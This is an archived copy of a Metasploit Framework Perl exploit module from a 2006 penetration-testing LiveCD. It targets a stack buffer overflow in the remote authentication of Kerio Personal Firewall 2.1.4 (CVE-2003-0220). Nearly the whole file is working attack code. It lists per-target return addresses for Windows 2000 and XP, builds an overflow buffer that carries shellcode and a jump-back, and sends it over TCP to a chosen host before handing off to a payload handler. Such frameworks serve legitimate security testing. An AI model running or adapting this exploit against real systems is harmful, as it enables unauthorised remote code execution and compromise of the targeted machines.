home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / kerio_auth.pm

< prev

next >

Wrap

Text File  |  2006-06-30  |  3KB  |  108 lines

---

1.  
2. ##
3. # This file is part of the Metasploit Framework and may be redistributed
4. # according to the licenses defined in the Authors field below. In the
5. # case of an unknown or missing license, this file defaults to the same
6. # license as the core Framework (dual GPLv2 and Artistic). The latest
7. # version of the Framework can always be obtained from metasploit.com.
8. ##
9.  
10. package Msf::Exploit::kerio_auth;
11. use base "Msf::Exploit";
12. use strict;
13. use Pex::Text;
14.  
15. my $advanced = { };
16.  
17. my $info =
18.   {
19.  
20.     'Name'  => 'Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow',
21.     'Version'  => '$Revision: 1.2 $',
22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
23.     'Arch'  => [ 'x86' ],
24.     'OS'    => [ 'win32', 'win2000', 'winxp', ],
25.     'Priv'  => 0,
26.     'UserOpts'  =>
27.       {
28.         'RHOST' => [1, 'ADDR', 'The target address'],
29.         'RPORT' => [1, 'PORT', 'The target port', 44334],
30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
31.       },
32.     'AutoOpts' => { 'EXITFUNC' => 'process' },
33.     'Payload' =>
34.       {
35.         'Space'     => 1000,
36.         'BadChars'  => "\x00",
37.         'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",
38.         'Keys'      => ['-ws2ord'],
39.       },
40.  
41.     'Description'  => Pex::Text::Freeform(qq{
42.     This module exploits a stack overflow in Kerio Personal Firewall 
43. administration authentication process. This module has only been tested 
44. against Kerio Personal Firewall 2 2.1.4.
45. }),
46.  
47.     'Refs'  =>
48.       [
49.         ['OSVDB', '6294'],
50.         ['BID', '7180'],
51.         ['CVE', '2003-0220'],
52.         ['URL', 'http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10'],
53.       ],
54.  
55.     'Targets' =>
56.       [
57.         ['Windows 2000 Pro SP4 English', 0x7c2ec68b],
58.         ['Windows XP Pro SP0 English',   0x77e3171b],
59.         ['Windows XP Pro SP1 English',   0x77dc5527],
60.       ],
61.  
62.     'Keys' => ['firewall'],
63.  
64.     'DisclosureDate' => 'Apr 28 2003',
65.  
66.   };
67.  
68. sub new {
69.     my $class = shift;
70.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
71.     return($self);
72. }
73.  
74. sub Exploit
75. {
76.     my $self = shift;
77.     my $target_host = $self->GetVar('RHOST');
78.     my $target_port = $self->GetVar('RPORT');
79.     my $target_idx  = $self->GetVar('TARGET');
80.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
81.     my $target = $self->Targets->[$target_idx];
82.  
83.     my $sploit =
84.       Pex::Text::AlphaNumText(4268). $shellcode.
85.       pack('V', $target->[1]). "\xe9\x0b\xfe\xff\xff";
86.  
87.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
88.  
89.     my $s = Msf::Socket::Tcp->new
90.       (
91.         'PeerAddr'  => $target_host,
92.         'PeerPort'  => $target_port,
93.         'LocalPort' => $self->GetVar('CPORT'),
94.         'SSL'       => $self->GetVar('SSL'),
95.       );
96.     if ($s->IsError) {
97.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
98.         return;
99.     }
100.  
101.     $s->Send($sploit);
102.     $self->Handler($s);
103.     $s->Close();
104.     return;
105. }
106.  
107. 1;
108.